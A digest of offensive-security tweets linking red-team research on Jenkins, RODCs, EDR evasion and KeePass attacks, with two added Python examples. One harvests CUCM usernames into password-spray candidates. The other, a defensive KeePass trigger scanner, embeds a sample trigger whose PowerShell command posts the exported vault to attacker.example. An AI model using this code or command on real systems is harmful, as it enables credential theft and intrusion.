[ AnubisOnSec, anubis ]
The very first Red Team based article officially published by @nvidia is out now!
Honored to have my write up be the first one, but there will be many more coming out from my team this year.
https://t.co/y62teiMpi5
https://developer.nvidia.com/blog/exploiting-and-securing-jenkins-instances-at-scale-with-groovywaiter/
[ tweet ]
[ elad_shamir, Elad Shamir ]
Have you ever wondered how RODCs work and whether compromising one would necessarily allow for privilege escalation?
The answers are in my new post:
At the Edge of Tier Zero: The Curious Case of the RODC
https://t.co/GeNn1cxxhX
https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06
[ tweet ]
[ bohops, bohops ]
PyBOF: In-memory loading and execution of Beacon Object Files (BOFs) through Python
https://t.co/Qu499zWNAn
cc: @kakt1s2015
https://github.com/rkbennett/pybof
[ tweet ]
[ eversinc33, eversinc33 ]
I am probably just tripping, but I didn't find any C# implementation of the StartWebclient BOF from @OutflankNL on github (?) so I did a quick copy paste port to C# to make that windows privesc even more straightforward https://t.co/LJgDB8Bd7E
https://github.com/eversinc33/SharpStartWebclient
[ tweet ]
Offensive Xwitter
I really like attacks on #KeePass, so here is a collection of tools and research on the topic:
- https://blog.harmj0y.net/redteaming/a-case-study-in-attacking-keepass/
- https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-part…
[ an0n_r0, an0n ]
somehow CVE-2023-24055 has been assigned on #KeePass for an attack path published by @harmj0y and @tifkin_ 7 years ago in 2016: https://t.co/kmWcoLBReo (look at the section "Exfiltration Without Malware - KeePass' Trigger System"). awesome!
https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
[ tweet ][ quote ]
[ _nwodtuhs, Charlie Bromberg "Shutdown" ]
Big up to @Fransosiche and @Wlayzz for the new "HTTP Request Smuggling" page on The Hacker Recipes
https://t.co/9k8aKrAIjz
https://www.thehacker.recipes/web/config/http-request-smuggling
[ tweet ]
[ NinjaParanoid, Chetan Nayak (Brute Ratel C4 Author) ]
Here it goes. A detailed blog on proxying your DLL loads and hiding the original callstack from userland hooks/ETW with a new set of undocumented API and some hacky tricks. Code is on my Github repository. This one was a brain buster
https://t.co/AKFW8hthXZ
https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/
[ tweet ]
[ snovvcrash, snovvcrash ]
Keep in mind when scraping usernames from a #Cisco #CUCM server with @n00py1's cucme[.]sh or @TrustedSec's SeeYouCM-Thief: the names can be not only within the <userName> tag but also within the <firstName> and <lastName> tags. Worth checking!
https://t.co/GGX5OeKQ3Q
https://ppn.snovvcrash.rocks/pentest/infrastructure/networks/sip-voip#cisco-ip-phones
[ tweet ]
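The point above, as an added example that is not code from cucme.sh, SeeYouCM-Thief or the linked notes: parse a CUCM UDS user listing (the /cucm-uds/users response that the scraping tools query), read <userName>, <firstName> and <lastName> rather than <userName> alone, and expand first/last pairs into candidate account names. The XML response and the host name in it are constructed for this example; the username formats in candidate_usernames are a guess at common corporate conventions, not anything CUCM returns.

```python
import xml.etree.ElementTree as ET

# Constructed sample shaped like a CUCM UDS /cucm-uds/users response. User 2 has an
# empty <userName> and user 3 has no <userName> element at all; both still leak a name.
SAMPLE_UDS_RESPONSE = """<users uri="https://cucm.example.local/cucm-uds/users" totalCount="3">
  <user uri="https://cucm.example.local/cucm-uds/users/jdoe">
    <id>1</id><userName>jdoe</userName>
    <firstName>Jane</firstName><lastName>Doe</lastName>
    <phoneNumber>1001</phoneNumber>
  </user>
  <user uri="https://cucm.example.local/cucm-uds/users/2">
    <id>2</id><userName></userName>
    <firstName>Robert</firstName><lastName>O'Neil</lastName>
  </user>
  <user uri="https://cucm.example.local/cucm-uds/users/3">
    <id>3</id>
    <firstName>Ana Maria</firstName><lastName>Silva</lastName>
  </user>
</users>"""


def _local(tag: str) -> str:
    """Drop an XML namespace prefix ({ns}tag -> tag) so lookups work with or without one."""
    return tag.rsplit("}", 1)[-1]


def parse_uds_users(xml_text: str) -> list[dict]:
    """One dict per <user>, holding whichever of userName/firstName/lastName are present and non-empty."""
    root = ET.fromstring(xml_text)
    users = []
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        rec = {}
        for child in el:
            key = _local(child.tag)
            if key in ("userName", "firstName", "lastName"):
                val = (child.text or "").strip()
                if val:
                    rec[key] = val
        if rec:
            users.append(rec)
    return users


def _norm(s: str) -> str:
    """Lowercase and keep only a-z, so "O'Neil" -> "oneil" and "Ana Maria" -> "anamaria"."""
    return "".join(ch for ch in s.lower() if "a" <= ch <= "z")


def candidate_usernames(rec: dict) -> set[str]:
    """Candidate account names for one record.

    A real userName is kept as-is (lowercased); a first/last pair is expanded into
    assumed corporate formats: first.last, flast, firstl, first_last, lastf."""
    cands = set()
    if rec.get("userName"):
        cands.add(rec["userName"].lower())
    first, last = _norm(rec.get("firstName", "")), _norm(rec.get("lastName", ""))
    if first and last:
        cands.update({f"{first}.{last}", f"{first[0]}{last}", f"{first}{last[0]}",
                      f"{first}_{last}", f"{last}{first[0]}"})
    elif first or last:
        cands.add(first or last)
    return cands


def harvest(xml_text: str) -> dict[str, set[str]]:
    """Map a label (userName, else "First Last") to its candidate set; the raw material for a spray list."""
    out = {}
    for rec in parse_uds_users(xml_text):
        label = rec.get("userName") or " ".join(
            p for p in (rec.get("firstName"), rec.get("lastName")) if p)
        out[label] = candidate_usernames(rec)
    return out


if __name__ == "__main__":
    for label, cands in harvest(SAMPLE_UDS_RESPONSE).items():
        print(f"{label}: {sorted(cands)}")
```

On a live target the response comes from the UDS endpoint the tools already hit; the only change to a scraper is to stop discarding records whose <userName> is blank, since the first/last pair still identifies an account.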
[ _ZakSec, Zak ]
New Masky release (v0.2.0). Nothing crazy but you can now easily pack the agent to avoid basic EDR detections (look at the -e & -fa parameters). Some bug fixes have also been applied on the PKINIT part, thanks @mpgn_x64 !
Here is an example with the awesome NimCrypt2 loader
[ tweet ]
[ _Wra7h, Christian W ]
70 shellcode execution methods to pop calc and chill to
https://t.co/YdvfxlkFRJ
https://github.com/Wra7h/FlavorTown/tree/main/C
[ tweet ]
[ a13xp0p0v, Alexander Popov ]
I summarized the experience with code collaboration platforms in a short article:
"Mirroring GitHub projects in 2023"
https://t.co/kit4Dlik7t
https://a13xp0p0v.github.io/2023/01/29/mirroring-github-projects.html
[ tweet ]
[ NinjaParanoid, Chetan Nayak (Brute Ratel C4 Author) ]
Some EDRs catch indirect syscalls with callstack analysis. Here is a totally new technique which builds a clean callstack originating from ntdll to avoid detections. No ROP required and tested and works against every EDR. Enjoy!
https://t.co/sALgfx6WQ0
https://0xdarkvortex.dev/hiding-in-plainsight/
[ tweet ]
[ d3lb3_, Julien Bedel ]
(1/5) New kid in town
Following last week's sudden regain of interest in KeePass trigger system abuse, I decided to prepone the release of KeePwn: an Impacket-based script dedicated to KeePass discovery and secret extraction for red teamers!
https://t.co/SXsy3UFY3K
https://github.com/Orange-Cyberdefense/KeePwn
[ tweet ]
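The trigger-system abuse behind the CVE-2023-24055 thread above and the KeePwn release, seen from the defender's side, as an added example that is not code from KeePwn or the harmj0y write-up: scan a KeePass 2.x KeePass.config.xml for trigger definitions that export the open database and hand the export to a command or URL. The config below is constructed (the benign trigger uses a placeholder TypeGuid). The two action TypeGuid values in ACTION_TYPES are the ones that circulate in published trigger-abuse write-ups and tooling; treat them as an assumption and confirm them against the KeePass build you review. The parameter heuristics fire independently of them.

```python
import sys
import xml.etree.ElementTree as ET

# Action TypeGuid values as seen in public trigger-abuse write-ups and tooling.
# ASSUMPTION: verify against the KeePass source for the version under review.
ACTION_TYPES = {
    "D5prW87VRr65NO2xP5RIIg==": "ExportActiveDatabase",
    "2uX4OwcwTBOe7y66y27kxw==": "ExecuteCommandLineOrUrl",
}
# Parameter substrings that point at an export format, a URL or a UNC path.
SUSPICIOUS_PARAMS = ("keepass xml", "keepass csv", "http://", "https://", "\\\\")

# Constructed sample: one harmless backup trigger and one exfiltration trigger.
SAMPLE_CONFIG = """<Configuration>
  <Application>
    <TriggerSystem>
      <Enabled>true</Enabled>
      <Triggers>
        <Trigger>
          <Name>Backup on save</Name>
          <Enabled>true</Enabled>
          <Actions>
            <Action>
              <TypeGuid>(constructed-benign-action-guid)</TypeGuid>
              <Parameters><Parameter>C:\\Backups\\vault.kdbx</Parameter></Parameters>
            </Action>
          </Actions>
        </Trigger>
        <Trigger>
          <Name>exfil</Name>
          <Enabled>true</Enabled>
          <Actions>
            <Action>
              <TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
              <Parameters>
                <Parameter>C:\\Users\\Public\\export.xml</Parameter>
                <Parameter>KeePass XML (2.x)</Parameter>
              </Parameters>
            </Action>
            <Action>
              <TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
              <Parameters>
                <Parameter>PowerShell.exe</Parameter>
                <Parameter>-c "Invoke-WebRequest -Uri https://attacker.example/up -Method POST -InFile C:\\Users\\Public\\export.xml"</Parameter>
              </Parameters>
            </Action>
          </Actions>
        </Trigger>
      </Triggers>
    </TriggerSystem>
  </Application>
</Configuration>"""


def _flag(el, default="true") -> bool:
    """Read a KeePass boolean element; missing or empty counts as the default."""
    return (el or default).strip().lower() != "false"


def scan_triggers(config_xml: str) -> dict:
    """Summarise the trigger system: is it on at all, how many triggers exist, which look like exfil."""
    root = ET.fromstring(config_xml)
    ts = root.find("./Application/TriggerSystem")
    system_enabled = ts is None or _flag(ts.findtext("Enabled"))
    total, suspicious = 0, []
    for trig in root.iterfind("./Application/TriggerSystem/Triggers/Trigger"):
        total += 1
        reasons = []
        for action in trig.iterfind("./Actions/Action"):
            guid = (action.findtext("TypeGuid") or "").strip()
            if guid in ACTION_TYPES:
                reasons.append(f"action {ACTION_TYPES[guid]}")
            for p in action.iterfind("./Parameters/Parameter"):
                text = p.text or ""
                if any(s in text.lower() for s in SUSPICIOUS_PARAMS):
                    reasons.append(f"parameter {text.strip()!r}")
        if reasons:
            suspicious.append({
                "name": (trig.findtext("Name") or "(unnamed)").strip(),
                # a trigger only fires when both it and the trigger system are enabled
                "active": system_enabled and _flag(trig.findtext("Enabled")),
                "reasons": reasons,
            })
    return {"trigger_system_enabled": system_enabled,
            "triggers_total": total, "suspicious": suspicious}


if __name__ == "__main__":
    xml_text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_CONFIG
    report = scan_triggers(xml_text)
    print(f"trigger system enabled: {report['trigger_system_enabled']}, "
          f"{report['triggers_total']} trigger(s) defined")
    for f in report["suspicious"]:
        print(f"  [{'ACTIVE' if f['active'] else 'disabled'}] {f['name']}: " + "; ".join(f["reasons"]))
```

Point it at a user's KeePass.config.xml (per-user config lives under %APPDATA%\KeePass) during an investigation, or at the enforced configuration file to confirm the trigger system is switched off there. Any trigger at all on a managed workstation deserves a look; the write-up's whole point is that KeePass executes these from a plain config file an attacker only needs write access to.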
[ _bin_Ash, Ash ]
Impacket's psexec drops a binary (RemCom) that is over 10 years old when creating the service it uses for command execution.
May we all aspire to write tooling that is still relevant 10 years later. RemCom = goated
Ref: https://t.co/LTNRaflIKr
RemCom: https://t.co/YrKw1nBtAt
https://github.com/fortra/impacket/blob/master/examples/psexec.py
https://github.com/kavika13/RemCom
[ tweet ]